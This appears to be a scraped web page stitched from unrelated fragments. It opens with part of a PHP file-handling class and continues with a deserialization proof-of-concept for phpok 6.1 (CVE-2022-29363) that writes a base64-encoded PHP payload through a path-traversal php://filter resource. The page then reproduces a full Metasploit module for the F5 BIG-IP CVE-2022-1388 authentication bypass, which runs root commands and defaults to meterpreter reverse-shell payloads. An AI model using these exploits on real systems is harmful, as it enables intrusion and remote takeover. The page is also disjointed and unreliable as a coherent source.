    public function rm($del,$type="file")
    {
    	if(!file_exists($del)){
    		return false;
    	}
    	if(is_file($del)){
    		unlink($del);
    		return true;
    	}
    	$array = $this->_dir_list($del);
    	if(!$array){
    		if($type == 'folder'){
    			rmdir($del);
    		}
    		return true;
    	}
    	foreach($array as $key=>$value){
    		if(file_exists($value)){
    			if(is_dir($value)){
    				$this->rm($value,$type);
    			}else{
    				unlink($value);
    			}
    		}
    	}
    	if($type == "folder"){
    		rmdir($del);
    	}
    	return true;
    }
    
    /**
     * 创建文件或目录
     * @参数 $file 文件或目录
     * @参数 $type 默认是dir，表示创建目录
     * @返回 true
    **/
    public function make($file,$type="dir")
    {
    	$newfile = $file;
    	$msg = "";
    	if(defined("ROOT")){
    		$root_strlen = strlen(ROOT);
    		if(substr($file,0,$root_strlen) == ROOT){
    			$newfile = substr($file,$root_strlen);
    		}
    		$msg = ROOT;//从根目录记算起是否有文件写入
    	}
    	$array = explode("/",$newfile);
    	$count = count($array);
    	if($type == "dir"){
    		for($i=0;$i<$count;$i++){
    			$msg .= $array[$i];
    			if(!file_exists($msg) && ($array[$i])){
    				mkdir($msg,0777);
    			}
    			$msg .= "/";
    		}
    	}else{
    		for($i=0;$i<($count-1);$i++){
    			$msg .= $array[$i];
    			if(!file_exists($msg) && ($array[$i])){
    				mkdir($msg,0777);
    			}
    			$msg .= "/";
    		}
    		if(!file_exists($file)){
    			@touch($file);//创建文件
    		}
    	}
    	return true;
    }
    
    /**
     * 复制操作
     * @参数 $old 旧文件（夹）
     * @参数 $new 新文件（夹）
     * @参数 $recover 是否覆盖
     * @返回 false/true
    **/
    public function cp($old,$new,$recover=true)
    {
    	if(!file_exists($old)){
    		return false;
    	}
    	if(is_file($old)){
    		//如果目标是文件夹
    		if(substr($new,-1) == '/'){
    			$this->make($new,'dir');
    			$basename = basename($old);
    			if(file_exists($new.$basename) && !$recover){
    				return false;
    			}
    			copy($old,$new.$basename);
    			return true;
    		}
    		if(file_exists($new) && !$recover){
    			return false;
    		}
    		copy($old,$new);
    		return true;
    	}
    	$basename = basename($old);
    	$this->make($new.$basename,'dir');
    	$dlist = $this->ls($old);
    	if($dlist && count($dlist)>0){
    		foreach($dlist as $key=>$value){
    			$this->cp($value,$new.$basename.'/',$recover);
    		}
    	}
    	return true;
    }
    
    /**
     * 文件移动操作
     * @参数 $old 旧文件（夹）
     * @参数 $new 新文件（夹）
     * @参数 $recover 是否覆盖
     * @返回 false/true
    **/
    public function mv($old,$new,$recover=true)
    {
    	if(!file_exists($old)){
    		return false;
    	}
    	if(substr($new,-1) == "/"){
    		$this->make($new,"dir");
    	}else{
    		$this->make($new,"file");
    	}
    	if(file_exists($new)){
    		if($recover){
    			unlink($new);
    		}else{
    			return false;
    		}
    	}else{
    		$new = $new.basename($old);
    	}
    	rename($old,$new);
    	return true;
    }
    
    /**
     * 获取文件夹列表
     * @参数 $folder 获取指定文件夹下的列表（仅一层深度）
     * @返回 数组
    **/
    public function ls($folder)
    {
    	$this->read_count++;
    	$list = $this->_dir_list($folder);
    	if(is_array($list)){
    		sort($list,SORT_STRING);
    	}
    	return $list;
    }
    
    /**
     * 获取文件夹及子文件夹等多层文件列表（无限级，长度受系统限制）
     * @参数 $folder 文件夹
     * @参数 $list 引用变量
    **/
    public function deep_ls($folder,&$list)
    {
    	$this->read_count++;
    	$tmplist = $this->_dir_list($folder);
    	if($tmplist){
    		foreach($tmplist as $key=>$value){
    			if(is_dir($value)){
    				$this->deep_ls($value,$list);
    			}else{
    				$list[] = $value;
    			}
    		}
    	}
    }
    
    /**
     * 取得文件夹下的列表
     * @参数 $file 文件（夹）
     * @参数 $type 仅支持folder或file，为file，直接返回$file本身
     * @返回 $file或数组
    **/
    private function _dir_list($file,$type="folder")
    {
    	if(substr($file,-1) == "/"){
    		$file = substr($file,0,-1);
    	}
    	if(!file_exists($file)){
    		return false;
    	}
    	if($type == "file" || is_file($file)){
    		return $file;
    	}else{
    		$handle = opendir($file);
    		$array = array();
    		while(false !== ($myfile = readdir($handle))){
    			if($myfile != "." && $myfile != ".." && $myfile != ".svn") $array[] = $file."/".$myfile;
    		}
    		closedir($handle);
    		return $array;
    	}
    }
    
    /**
     * 数组转成字符串
     * @参数 $array 要转的数组的
     * @参数 $var 传递的变量
     * @参数 $content 内容
     * @返回 
     * @更新时间 
    **/
    private function __array($array,$var,$content="")
    {
    	foreach($array AS $key=>$value){
    		if(is_array($value)){
    			$content .= $this->__array($value,"".$var."[\"".$key."\"]");
    		}else{
    			$old_str = array('"',"<?php","?>","\r");
    			$new_str = array("'","&lt;?php","?&gt;","");
    			$value = str_replace($old_str,$new_str,$value);
    			$content .= "\$".$var."[\"".$key."\"] = \"".$value."\";\n";
    		}
    	}
    	return $content;
    }
    
    /**
     * 打开文件
     * @参数 $file 打开的文件
     * @参数 $type 打开类型，默认是wb
    **/
    private function _open($file,$type="wb")
    {
    	$handle = fopen($file,$type);
    	$this->read_count++;
    	return $handle;
    }
    
    /**
     * 写入信息
     * @参数 $content 内容
     * @参数 $file 要写入的文件
     * @参数 $type 打开方式
     * @返回 true
    **/
    private function _write($content,$file,$type="wb")
    {
    	if($content){
    		$content = stripslashes($content);
    	}
    	$handle = $this->_open($file,$type);
    	fwrite($handle,$content);
    	unset($content);
    	$this->_close($handle);
    	return true;
    }
    
    /**
     * 关闭句柄
     * @参数 $handle 句柄
    **/
    private function _close($handle)
    {
    	return fclose($handle);
    }
    
    /**
     * 附件下载
     * @参数 $file 要下载的文件地址
     * @参数 $title 下载后的文件名
    **/
    public function download($file,$title='')
    {
    	if(!$file){
    		return false;
    	}
    	if(!file_exists($file)){
    		return false;
    	}
    	$ext = pathinfo($file,PATHINFO_EXTENSION);
    	$filesize = filesize($file);
    	if(!$title){
    		$title = basename($file);
    	}else{
    		$title = str_replace('.'.$ext,'',$title);
    		$title.= '.'.$ext;
    	}
    	ob_end_clean();
    	set_time_limit(0);
    	header("Content-type: applicatoin/octet-stream");
    	header("Date: ".gmdate("D, d M Y H:i:s",time())." GMT");
    	header("Last-Modified: ".gmdate("D, d M Y H:i:s",time())." GMT");
    	header("Content-Encoding: none");
    	header("Content-Disposition: attachment; filename=".rawurlencode($title)."; filename*=utf-8''".rawurlencode($title));
    	header("Accept-Ranges: bytes");
    	$range = 0;
    	$size2 = $filesize -1;
    	if (isset ($_SERVER['HTTP_RANGE'])) {
    	    list ($a, $range) = explode("=", $_SERVER['HTTP_RANGE']);
    	    $new_length = $size2 - $range;
    	    header("HTTP/1.1 206 Partial Content");
    	    header("Content-Length: ".$new_length); //输入总长
    	    header("Content-Range: bytes ".$range."-".$size2."/".$filesize);
    	} else {
    	    header("Content-Range: bytes 0-".$size2."/".$filesize); //Content-Range: bytes 0-4988927/4988928
    	    header("Content-Length: ".$filesize);
    	}
    	$read_buffer=4096;
    	$sum_buffer = 0;
    	$handle = fopen($file, "rb");
    	fseek($handle, $range);
    	ob_start();
    	while (!feof($handle) && $sum_buffer<$filesize) {
    		echo fread($handle,$read_buffer);
    		$sum_buffer+=$read_buffer;
    		ob_flush();
    		flush();
    	}
    	ob_end_clean();
    	fclose($handle);
    }
    

}

class cache{  
protected $key\_id='www';  
protected $key\_list='aaPD9waHAgcGhwaW5mbygpOz8+"';  
protected $folder='php://filter/write=convert.base64-decode/resource=../../../../../../../Applications/MxSrvs/www/a';

}

$token = new token\_lib();  
$file = new file\_lib();  
$token->keyid($file->cat("./index.php"));  
echo $token->encode(new cache());

\`

CVE-2022-29363: phpok6.1 has a deserialization vulnerability, and can getshell by writing arbitrary files  · Issue #12 · qinggan/phpok

This Metasploit module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',        'Description' => %q{          This module exploits an authentication bypass vulnerability          in the F5 BIG-IP iControl REST service to gain access to the          admin account, which is capable of executing commands          through the /mgmt/tm/util/bash endpoint.          Successful exploitation results in remote code execution          as the root user.        },        'Author' => [          'Heyder Andrade', # Metasploit module          'alt3kx <alt3kx[at]protonmail.com>', # PoC          'James Horseman', # Technical Writeup          'Ron Bowes' # Documentation of exploitation specifics        ],        'References' => [          ['CVE', '2022-1388'],          ['URL', 'https://support.f5.com/csp/article/K23605346'],          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup          ['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-05-04', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :bourne,                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session          'SideEffects' => [            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)            ARTIFACTS_ON_DISK # CmdStager          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),        OptString.new('HttpPassword', [true, 'iControl password', ''])      ]    )    register_advanced_options([      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])    ])  end  def check    print_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),      'method' => 'GET'    })    return CheckCode::Unknown unless res&.code == 401    body = res.get_json_document    return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'    signature = Rex::Text.rand_text_alpha(13)    stub = "echo #{signature}"    res = send_command(stub)    return CheckCode::Safe unless res&.code == 200    body = res.get_json_document    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'    return CheckCode::Vulnerable if body['commandResult'].chomp == signature    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_command(cmd)    unless res      print_warning('Command execution timed out')      return    end    json = res.get_json_document    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'      fail_with(Failure::PayloadFailed, 'Failed to execute command')    end    print_good('Successfully executed command')    return unless (cmd_result = json['commandResult'])    vprint_line(cmd_result)  end  def send_command(cmd)    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'headers' => {        'Host' => 'localhost',        'Connection' => 'keep-alive, X-F5-Auth-Token',        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)      },      'data' => {        'command' => 'run',        'utilCmdArgs' => "-c '#{bash_cmd}'"      }.to_json    }, datastore['CmdExecTimeout'])  endend

Tag

#ssl